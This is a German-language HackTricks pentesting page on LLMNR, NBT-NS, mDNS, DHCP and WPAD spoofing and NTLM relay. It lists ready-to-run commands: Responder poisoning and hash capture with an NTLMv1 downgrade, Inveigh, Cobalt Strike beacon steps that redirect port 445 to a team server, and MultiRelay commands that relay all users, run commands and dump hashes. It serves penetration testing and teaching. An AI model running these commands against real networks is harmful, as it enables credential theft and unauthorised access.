Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Lernen Sie und üben Sie AWS-Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie und üben Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegramm-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositorys senden.

Netzwerkprotokolle

Lokale Hostauflösungsprotokolle

LLMNR, NBT-NS und mDNS:
Microsoft und andere Betriebssysteme verwenden LLMNR und NBT-NS zur lokalen Namensauflösung, wenn DNS fehlschlägt. Ebenso verwenden Apple- und Linux-Systeme mDNS.
Diese Protokolle sind anfällig für Abfangen und Spoofing aufgrund ihrer nicht authentifizierten, broadcastartigen Natur über UDP.
Responder kann verwendet werden, um Dienste zu imitieren, indem gefälschte Antworten an Hosts gesendet werden, die diese Protokolle abfragen.
Weitere Informationen zur Dienstimitation mit Responder finden Sie hier.

Web Proxy Auto-Discovery Protocol (WPAD)

WPAD ermöglicht Browsern, Proxyeinstellungen automatisch zu entdecken.
Die Entdeckung erfolgt über DHCP, DNS oder Rückgriff auf LLMNR und NBT-NS, wenn DNS fehlschlägt.
Responder kann WPAD-Angriffe automatisieren und Clients zu bösartigen WPAD-Servern umleiten.

Responder für Protokollvergiftung

Responder ist ein Tool, das zur Vergiftung von LLMNR-, NBT-NS- und mDNS-Abfragen verwendet wird und selektiv auf Abfragetypen reagiert, hauptsächlich auf SMB-Dienste abzielt.
Es ist in Kali Linux vorinstalliert und unter /etc/responder/Responder.conf konfigurierbar.
Responder zeigt erfasste Hashes auf dem Bildschirm an und speichert sie im Verzeichnis /usr/share/responder/logs.
Es unterstützt sowohl IPv4 als auch IPv6.
Die Windows-Version von Responder ist hier verfügbar.

Ausführen von Responder

Um Responder mit den Standardeinstellungen auszuführen: responder -I <Schnittstelle>
Für aggressiveres Sondieren (mit potenziellen Nebenwirkungen): responder -I <Schnittstelle> -P -r -v
Techniken zum Erfassen von NTLMv1-Herausforderungen/Antworten für einfachere Knackvorgänge: responder -I <Schnittstelle> --lm --disable-ess
Die WPAD-Imitation kann aktiviert werden mit: responder -I <Schnittstelle> --wpad
NetBIOS-Anfragen können zur IP des Angreifers aufgelöst und ein Authentifizierungsproxy eingerichtet werden: responder.py -I <Schnittstelle> -Pv

DHCP-Vergiftung mit Responder

Das Spoofing von DHCP-Antworten kann die Routinginformationen eines Opfers dauerhaft vergiften und bietet eine unauffälligere Alternative zum ARP-Spoofing.
Es erfordert genaue Kenntnisse der Konfiguration des Zielnetzwerks.
Ausführen des Angriffs: ./Responder.py -I eth0 -Pdv
Diese Methode kann effektiv NTLMv1/2-Hashes erfassen, erfordert jedoch eine sorgfältige Handhabung, um Netzwerkstörungen zu vermeiden.

Erfassen von Anmeldedaten mit Responder

Responder wird Dienste mit den oben genannten Protokollen imitieren und Anmeldedaten erfassen (in der Regel NTLMv2 Challenge/Response), wenn ein Benutzer versucht, sich gegen die gefälschten Dienste zu authentifizieren.
Versuche können unternommen werden, um auf NetNTLMv1 herabzustufen oder ESS zu deaktivieren, um das Knacken von Anmeldeinformationen zu erleichtern.

Es ist wichtig zu beachten, dass der Einsatz dieser Techniken legal und ethisch erfolgen sollte, um eine ordnungsgemäße Autorisierung sicherzustellen und Störungen oder unbefugten Zugriff zu vermeiden.

Inveigh

Inveigh ist ein Tool für Penetrationstester und Red Teamer, das für Windows-Systeme entwickelt wurde. Es bietet ähnliche Funktionen wie Responder und führt Spoofing- und Man-in-the-Middle-Angriffe durch. Das Tool hat sich von einem PowerShell-Skript zu einer C#-Binärdatei entwickelt, mit Inveigh und InveighZero als Hauptversionen. Detaillierte Parameter und Anweisungen finden Sie im Wiki.

Inveigh kann über PowerShell betrieben werden:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Oder ausgeführt als eine C#-Binärdatei:

Inveigh.exe

NTLM Relay Angriff

Dieser Angriff nutzt SMB-Authentifizierungssitzungen, um auf eine Zielmaschine zuzugreifen und bei Erfolg eine Systemshell zu erhalten. Wichtige Voraussetzungen sind:

Der authentifizierende Benutzer muss über lokale Admin-Zugriffsrechte auf dem weitergeleiteten Host verfügen.
SMB-Signierung sollte deaktiviert sein.

445 Port Weiterleitung und Tunneling

In Szenarien, in denen eine direkte Netzwerkeinführung nicht möglich ist, muss der Datenverkehr auf Port 445 weitergeleitet und getunnelt werden. Tools wie PortBender helfen dabei, den Port 445-Verkehr auf einen anderen Port umzuleiten, was entscheidend ist, wenn lokale Admin-Zugriffsrechte für das Laden von Treibern verfügbar sind.

PortBender Einrichtung und Betrieb in Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Weitere Tools für NTLM Relay Attacke

Metasploit: Einrichten mit Proxies, lokalen und entfernten Host-Details.
smbrelayx: Ein Python-Skript zum Weiterleiten von SMB-Sitzungen und Ausführen von Befehlen oder Bereitstellen von Hintertüren.
MultiRelay: Ein Tool aus der Responder-Suite zum Weiterleiten bestimmter Benutzer oder aller Benutzer, Ausführen von Befehlen oder Dumpen von Hashes.

Jedes Tool kann konfiguriert werden, um bei Bedarf über einen SOCKS-Proxy zu arbeiten, was Angriffe auch bei indirektem Netzwerkzugriff ermöglicht.

MultiRelay Betrieb

MultiRelay wird aus dem /usr/share/responder/tools Verzeichnis ausgeführt und zielt auf spezifische IPs oder Benutzer ab.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Erzwingen von NTLM-Anmeldungen

In Windows können Sie möglicherweise einige privilegierte Konten zwingen, sich bei beliebigen Maschinen anzumelden. Lesen Sie die folgende Seite, um zu erfahren, wie:

Force NTLM Privileged Authentication

Referenzen

Lernen Sie & üben Sie AWS-Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie & üben Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories einreichen.

PreviousWebRTC DoS NextSpoofing SSDP and UPnP Devices with EvilSSDP

Last updated 1 month ago